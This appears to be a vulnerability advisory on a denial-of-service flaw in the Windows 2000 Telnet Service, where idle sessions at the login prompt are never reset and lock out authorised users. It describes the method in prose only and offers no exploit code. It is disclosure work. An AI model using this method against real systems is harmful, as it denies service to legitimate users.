COMMAND

    telnetd

SYSTEMS AFFECTED

    Windows 2000

PROBLEM

    Alexander Ivanchev found following.  System Environment:

        Windows 2000 Professional Final Build [Version 5.00.2195]
        Service Pack 1, All latest windowsupdate.com security  updates
        (as of 11/08/2000)
        Telnet Service Build 5.00.99201.1

    a. DoS - The Telnet Service in question is vulnerable to a  simple
       Denial of Service attack.   The problem apparently lies  within
       the  login  routine  of  the   daemon.   The  problem  can   be
       demonstrated by  telneting to  a machine  running the specified
       version of the Telnet Service and waiting at the login/password
       prompt until a session timeout takes place.  However, after  it
       does time out the connection  is not reset by the  daemon until
       the user presses a key.   In Windows 2000 Professional, due  to
       the fact, it allows only  one telnet connection per host,  this
       will effectively disable  access for the  authorized user.   It
       was   not    tested    the   problem    with    Server/Advanced
       Server/Datacenter but it is  believed that by establishing  the
       maximum number of allowed connections and not terminating  them
       would result  in the  same problem.   Thus, this  constitutes a
       Denial  of  Service  attack.   Theoretically,  it is also quite
       possible  to  exhaust  server  side  sockets  if there is not a
       limit imposed on the maximum number of telnet sessions.

    b. Possible code problem -  On the Windows 2000 Professional  test
       machine  the  above  vulnerability  was  tested,  the following
       strange  behavior  of  the  telnet  service  was  observed:  By
       establishing a telnet session,  and not terminating it,  during
       the wait  interval, attempts  to establish  a different  telnet
       session fail with the following message:

        Microsoft Windows Workstation allows only 1 Telnet Client License
        Server has closed connection

        Connection to host lost.

       However, when a connection  is attempted AFTER the  session had
       timed out, but it is  still not reset, SOMETIMES the  following
       return message would result:

        ~r?q?LL>ECHELON?ECHELON?ECHELON?echelon?echelon
        Microsoft Windows Workstation allows only 1 Telnet Client License
        Server has closed connection

        Connection to host lost.

       Where ECHELON is the hostname of the machine.  Needless to say,
       this does not seem right.

    c. Note: When  a machine comes  under the above-described  attack,
       the  'List  the  current  users'  telnet  admin option will NOT
       report established  connections, since  a login  would not have
       taken  place,  even  though  the  number of allowed connections
       could  have  been  reached.  (This  of  course  could be easily
       discovered using netstat or an equivalent utility)

SOLUTION

    Nothing yet.